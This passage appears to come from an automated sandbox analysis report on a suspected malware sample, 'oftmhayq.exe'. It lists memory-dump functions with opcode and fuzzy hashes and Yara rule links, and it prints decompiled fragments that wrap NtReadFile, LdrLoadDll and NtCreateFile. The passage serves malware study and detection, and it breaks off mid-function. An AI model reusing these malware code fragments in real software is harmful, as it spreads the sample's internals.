                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4fb13c0ad6044d7607f8e7ff800a52a86594700ad52156ac80c240f5d7ce866e
                                                • Instruction ID: 534348341cf2b125b37f51ef76cc6063271b3d6364c335c496abc39bf1387f0b
                                                • Opcode Fuzzy Hash: 4fb13c0ad6044d7607f8e7ff800a52a86594700ad52156ac80c240f5d7ce866e
                                                • Instruction Fuzzy Hash: 97017C32308A009FC715CB69D845C66BBF9FF8A221305469BF15AC7772C731EC418B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD0BA7, Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1967e4cbd32f8f718313d9bf58818703bb834bd935d38dd506323505dc61adb3
                                                • Instruction ID: 5f300f9a44e61dbfec68715b47de3278811fd7d10b68bcaabb4b35b269737479
                                                • Opcode Fuzzy Hash: 1967e4cbd32f8f718313d9bf58818703bb834bd935d38dd506323505dc61adb3
                                                • Instruction Fuzzy Hash: 0D01217A30C2904ED322963AAC646EA7FE8DA832A8B0D00E7D095C7192C1128807CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD7090, Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d46220c5ad3dc064b4036eb7881e5f1530499977d517f1535bc222494e1701d
                                                • Instruction ID: a8fdcf74018e783ba056a8c446908a719a9622049b64699d969f457d1995147a
                                                • Opcode Fuzzy Hash: 3d46220c5ad3dc064b4036eb7881e5f1530499977d517f1535bc222494e1701d
                                                • Instruction Fuzzy Hash: 760171B5709340CFC32ACF28E8858267BB5FB8A31571545B9E45A8B752CB35DC46CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD2B56, Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7c265c8ae4a595154e5c6e1ce42d357897d9c0ddd741995ff148582f1ec48669
                                                • Instruction ID: f079b5ecd9bb223018033a0ffe785b934130a47ae3b24cca7708c5f7f10dc87b
                                                • Opcode Fuzzy Hash: 7c265c8ae4a595154e5c6e1ce42d357897d9c0ddd741995ff148582f1ec48669
                                                • Instruction Fuzzy Hash: 3B01DF76A10255DFCB15CF68C884BAEBBA5BF88310F048465E825D7780CBB0DC05C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD72B8, Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9bbb131bff994641304284ceee0473b65e3729216da9627071f6b30d3a28e6a9
                                                • Instruction ID: 7a8c4d738fe6b95622195b18fadc9de660a4748570216cda5aa814d91a2fb8dc
                                                • Opcode Fuzzy Hash: 9bbb131bff994641304284ceee0473b65e3729216da9627071f6b30d3a28e6a9
                                                • Instruction Fuzzy Hash: C7F0B4B2B082259F8B0C9FA8B4004AA77E9EB8423671440BFF10EC7640EA31DD41C784
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD81F0, Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8a3d479a22e867561fac6276f2be63da9e664e973dd65d79fc0df63f5a546608
                                                • Instruction ID: 4a8e2a80dcc6b200ff33a6531a595592d758326f911ea54c42c83e201a19b48b
                                                • Opcode Fuzzy Hash: 8a3d479a22e867561fac6276f2be63da9e664e973dd65d79fc0df63f5a546608
                                                • Instruction Fuzzy Hash: 56F02BB27089549FC725874DD444DA6BBAAEBC5320B16C15BE03BC7252C734EC01CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07ADDBE7, Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed89f49a5251f21fdae5efd3dc1be2636cd181bfe998dc19af04d8630c8a4b76
                                                • Instruction ID: baa926304b10edcc2813a10ba2ccff04fa0e1dc41103495a41c697d68035a84f
                                                • Opcode Fuzzy Hash: ed89f49a5251f21fdae5efd3dc1be2636cd181bfe998dc19af04d8630c8a4b76
                                                • Instruction Fuzzy Hash: 92F0E2353081909F87025B69989487A7FAAEBCE11030480BBF05ACB262D9608C0297E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD4D6D, Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 909827df004a23ee1aa10e8fbe31ffc2e92e27351eeb1d67678fae9b8c614820
                                                • Instruction ID: 7b62cf09a4bb411030cc4d038fa532fc10af8cc6b4c0b4ae7e25d1e891c94f88
                                                • Opcode Fuzzy Hash: 909827df004a23ee1aa10e8fbe31ffc2e92e27351eeb1d67678fae9b8c614820
                                                • Instruction Fuzzy Hash: 81F03AA214E3D04FD7038328A8794AA7F719D8715570A81DBC0D5CF5A7D2188D4AC7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07ADDC40, Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 536c78c08518d3787a2f59bc4d3383d3780605f15a3ded7838b3639458e89c60
                                                • Instruction ID: 0d7ee2c6648f731ee2bbcc1ec8369c62f29948239801c6b956e50c262d11dcc7
                                                • Opcode Fuzzy Hash: 536c78c08518d3787a2f59bc4d3383d3780605f15a3ded7838b3639458e89c60
                                                • Instruction Fuzzy Hash: E7F0BEB57081048FCB01EB74E8409AEFBA2BFC5301B5488AED05987661CB35EC06CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07ADD830, Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dcecf72fce8e411267396de77b9b27c805c803d363c13e6c8b52fed0ab256ba7
                                                • Instruction ID: d20564178b4018ce249c930984007f56d9e065e5082a49f3b8aed805a13b3837
                                                • Opcode Fuzzy Hash: dcecf72fce8e411267396de77b9b27c805c803d363c13e6c8b52fed0ab256ba7
                                                • Instruction Fuzzy Hash: 81F0E5BA3082618FC70A8B10D9058B97BF8EF4A35234502DBD80ACB2A3C625CC01C7E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07ADDBF8, Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 47b6d189a6a69f764843af3decf90471ef4217857c72efdc7cc562fa9df3a776
                                                • Instruction ID: 6e9ba6598a81b967e86062365e18e404c45e5c1d4f0d9c95e651e5dfd34b56d5
                                                • Opcode Fuzzy Hash: 47b6d189a6a69f764843af3decf90471ef4217857c72efdc7cc562fa9df3a776
                                                • Instruction Fuzzy Hash: AAE092713000146B87146A6E988096F7BEBABCD664B14803BF11ACB320DDA5CC0293E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD1620, Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c7b159dc7f7b3fe00bda7d06145d3a90dbac726912f49ce616a5cb164396803
                                                • Instruction ID: b88a9630c161d0a29816c8ffe6ea0edbcb881059e296f2b3df78a662ced34905
                                                • Opcode Fuzzy Hash: 6c7b159dc7f7b3fe00bda7d06145d3a90dbac726912f49ce616a5cb164396803
                                                • Instruction Fuzzy Hash: 66E09BB560CBB91DD73246F860143A2BFD58B82124F0D8999D49F81981D555D90987C1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD81B0, Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5fd9a43c8519c0472b6c276b45e8929535b855ffb48c98031c354a2116c7746c
                                                • Instruction ID: c5355352ebe3806bd1cd6ad6ae1d88fe8f687e322f9b368a5537f81e6a580f0e
                                                • Opcode Fuzzy Hash: 5fd9a43c8519c0472b6c276b45e8929535b855ffb48c98031c354a2116c7746c
                                                • Instruction Fuzzy Hash: F4E0DF3631A6910B871606697C854BABFAAEACA22931481BBF509C3B02CE258C068391
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD6F10, Relevance: .0, Instructions: 24COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 96b395b340c4078c28d97f1d1b8e13fba6e0e753ea864c792eab33b021bb8a9d
                                                • Instruction ID: 5e123f4322ede3dc3e527b67104b17f1a2f6b2520e5c4b3ebe182ddc8567a21d
                                                • Opcode Fuzzy Hash: 96b395b340c4078c28d97f1d1b8e13fba6e0e753ea864c792eab33b021bb8a9d
                                                • Instruction Fuzzy Hash: 0DE09271506209DFCB01DF64E5550EDB771EFC5300B10859AD41987251DB342F16DBD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD7318, Relevance: .0, Instructions: 24COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2f91969665f71d8f08fb7fda9aec7095e0570cae03e05d753392795349531cd
                                                • Instruction ID: 96b21193bd2a14d0c570ffd006977d5be2ae3cc03a059b23e2e4c35061c213a7
                                                • Opcode Fuzzy Hash: b2f91969665f71d8f08fb7fda9aec7095e0570cae03e05d753392795349531cd
                                                • Instruction Fuzzy Hash: 2DE0C27221C5A46FC31A8768F8509F1BBACEA422253580097D419C2402EA12AC10C3E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD81C0, Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 81b2d84ac4314572d190777ead948170c856fd34fcf7716a03bd1dd4bca5ce80
                                                • Instruction ID: d2025ea13f8b204a4aef5d2a4caf7808957f9f8982f9bcf3d2ecf34fa3bab440
                                                • Opcode Fuzzy Hash: 81b2d84ac4314572d190777ead948170c856fd34fcf7716a03bd1dd4bca5ce80
                                                • Instruction Fuzzy Hash: D9D05E76319521170625155F6C8883BBBDFE7CD535314813BFA09C3300DDA08C068290
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07ADE740, Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2dd1d34b2767e3fcc04eb67bb2d2eab65fabc223017cd8795aee77af1dac66b2
                                                • Instruction ID: f93a713e294cb3ab0e32c6304156b0150456e17bd58edc04257eb713ba414211
                                                • Opcode Fuzzy Hash: 2dd1d34b2767e3fcc04eb67bb2d2eab65fabc223017cd8795aee77af1dac66b2
                                                • Instruction Fuzzy Hash: 22E0C2F13002389F8508B364D910C5933A7BF8D26030106E5D55D9F365CE60BC0147E7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07ADFE83, Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a56eadded9572fbd285b6a40e3d1a8e3f8ab9264447d9a1288397751a944090
                                                • Instruction ID: 49f42cdd5e43194d06019d084572aa7c745897c9d7913a6e54df3366daffae39
                                                • Opcode Fuzzy Hash: 7a56eadded9572fbd285b6a40e3d1a8e3f8ab9264447d9a1288397751a944090
                                                • Instruction Fuzzy Hash: DBD05E351083A09FC302CB18C8508A6BBB5FFCA214719898FE8408B252CB619D1AC7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD74C4, Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b55dedfb56f316ef2386896234468e076dabdd7f0572f7a31cd3d87f30c67e7b
                                                • Instruction ID: 55a10d7c7013436915a2b12ab55e3b4450c6b9742883f9adef535b79e06a8f41
                                                • Opcode Fuzzy Hash: b55dedfb56f316ef2386896234468e076dabdd7f0572f7a31cd3d87f30c67e7b
                                                • Instruction Fuzzy Hash: CDD0C975B40108DF8B44DBADE4585EC7BB1EFC9625B0000AAE25AD7660DB319C158F81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07ADFFA0, Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ccb03f726f5528b1211f3dbdb5441b52f476579f9ee82d941c71a0ccba6d48d
                                                • Instruction ID: 8f61593f91e382530f42c60340002c5a7a7d7df2daadec73e7f8dae378882a6d
                                                • Opcode Fuzzy Hash: 8ccb03f726f5528b1211f3dbdb5441b52f476579f9ee82d941c71a0ccba6d48d
                                                • Instruction Fuzzy Hash: E6C08C2614E3C00FEB13E33028134D3BFB05E27A2830985CBD086C9017C058190AC72A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD772C, Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd6454af539bba6f2c2c3697cf14622724de8a4dda20ff84805b9c0095acf825
                                                • Instruction ID: a84d447044d4491f229b3aecc2604260dc3bf60ec3fe0726af0f8af189ea5aa3
                                                • Opcode Fuzzy Hash: dd6454af539bba6f2c2c3697cf14622724de8a4dda20ff84805b9c0095acf825
                                                • Instruction Fuzzy Hash: 17D01279740004CF8608DB59D4148E873B1DFC9619F0100AAE247C7630CB31DC55CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD768A, Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 44984421afef4953dae1f0bdb27ca9b9154116a72220d2754321730f36284ad4
                                                • Instruction ID: e4f6fb35f2729c6cf893ea31c0a2681c2979ca6b32e7eb90d1dd3508ab03260b
                                                • Opcode Fuzzy Hash: 44984421afef4953dae1f0bdb27ca9b9154116a72220d2754321730f36284ad4
                                                • Instruction Fuzzy Hash: FAD01275710004CF8B48DB5AE4248E873B5EFCD615B0000EAE216C7660CB729D148B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07ADE556, Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5bea61fd5946751039f7b183752df63b56d51538a97141f916f4d256a1e11fdb
                                                • Instruction ID: fec718704b8a3f372004316418e3228342f506e3b2d2866c8513196fadb95069
                                                • Opcode Fuzzy Hash: 5bea61fd5946751039f7b183752df63b56d51538a97141f916f4d256a1e11fdb
                                                • Instruction Fuzzy Hash: 5FC08CB2E58048C7CA014B40780D3D07370EB1225BF004285DC0A0800067390A198A81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07ADF7AA, Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f3274118a5256d3b675bbf4d702804771f9e65e5fb24dfa569c7730cc130b56
                                                • Instruction ID: fe4e45dead4138fbdacb5e5b4ca3b72560e965b6283cfdfc9c3637c90c65cc1e
                                                • Opcode Fuzzy Hash: 3f3274118a5256d3b675bbf4d702804771f9e65e5fb24dfa569c7730cc130b56
                                                • Instruction Fuzzy Hash: 26B092257044004F8648E658CC52466F7A39BC9396BA8C4A99C0DCB355EE23DD038AC5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07ADF7B0, Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                                                • Instruction ID: e80b9cbb32ce7aa80f269217a2acaa4f8c5de131eb2df65f765f3a476441bad2
                                                • Opcode Fuzzy Hash: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                                                • Instruction Fuzzy Hash: 3DB002747054005B8748D65DD951515A7D29BC9215728C4AD641DC7355DE22DD039644
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07AD8198, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5a59f213a8d2b0a54148dc3f29bdd04c0028f729aec327b196148e211c99ac2
                                                • Instruction ID: 777159729b0f65741a621ef6b22dbd7ec3ec27698709ee7f8408949270e0b186
                                                • Opcode Fuzzy Hash: f5a59f213a8d2b0a54148dc3f29bdd04c0028f729aec327b196148e211c99ac2
                                                • Instruction Fuzzy Hash: B6C092B0606240CFCB16CF20D1498547BB2AF8230936940DAE0098B622CB32DC82CB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07ADE56A, Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b5daf2f631a46200592fbe9dea7f2a48a8ab1f6405d9026bf25e8f92fc77d0c
                                                • Instruction ID: 639784decc0a6d57e755e56dd25889c7d9d445555367e24017d1e10d8a6c62c5
                                                • Opcode Fuzzy Hash: 6b5daf2f631a46200592fbe9dea7f2a48a8ab1f6405d9026bf25e8f92fc77d0c
                                                • Instruction Fuzzy Hash: 97A0027195D04CC78D548A50750E8347734E242696B0007D5FC1F89644AE365C32CFC2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 07AD5D28, Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (Uf$(Uf$t%Qf$t%Qf
                                                • API String ID: 0-2797057296
                                                • Opcode ID: c8f8e959b35af166c14f07703891865eadc4e4bd45e971e86452d548686cd482
                                                • Instruction ID: f956d84dd1f5fc6ec00afd67b71033f22e33d9158f98f7a0b7b0eb4e9b56475d
                                                • Opcode Fuzzy Hash: c8f8e959b35af166c14f07703891865eadc4e4bd45e971e86452d548686cd482
                                                • Instruction Fuzzy Hash: E7A14CB4A00205CFD724DF68C488AA9B7F6EF89714F1684A9E45A9F375DB31EC80CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: oftmhayq.exe PID: 3708 Parent PID: 4000 oftmhayq.exeCOMMON

                                                Executed Functions

                                                Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                0x00419e13
                                                0x00419e1f
                                                0x00419e27
                                                0x00419e32
                                                0x00419e4d
                                                0x00419e55
                                                0x00419e59

                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                0x0040acec
                                                0x0040acef
                                                0x0040acf4
                                                0x0040acf9
                                                0x0040ad03
                                                0x0040ad08
                                                0x0040ad0b
                                                0x0040ad0d
                                                0x0040ad15
                                                0x0040ad1a
                                                0x0040ad1a
                                                0x0040ad21
                                                0x0040ad29
                                                0x0040ad2c
                                                0x0040ad2e
                                                0x0040ad42
                                                0x00000000
                                                0x0040ad44
                                                0x0040ad4a
                                                0x0040acfe
                                                0x0040acfe
                                                0x0040acfe

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                0x00419d6f
                                                0x00419d77
                                                0x00419dad
                                                0x00419db1

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
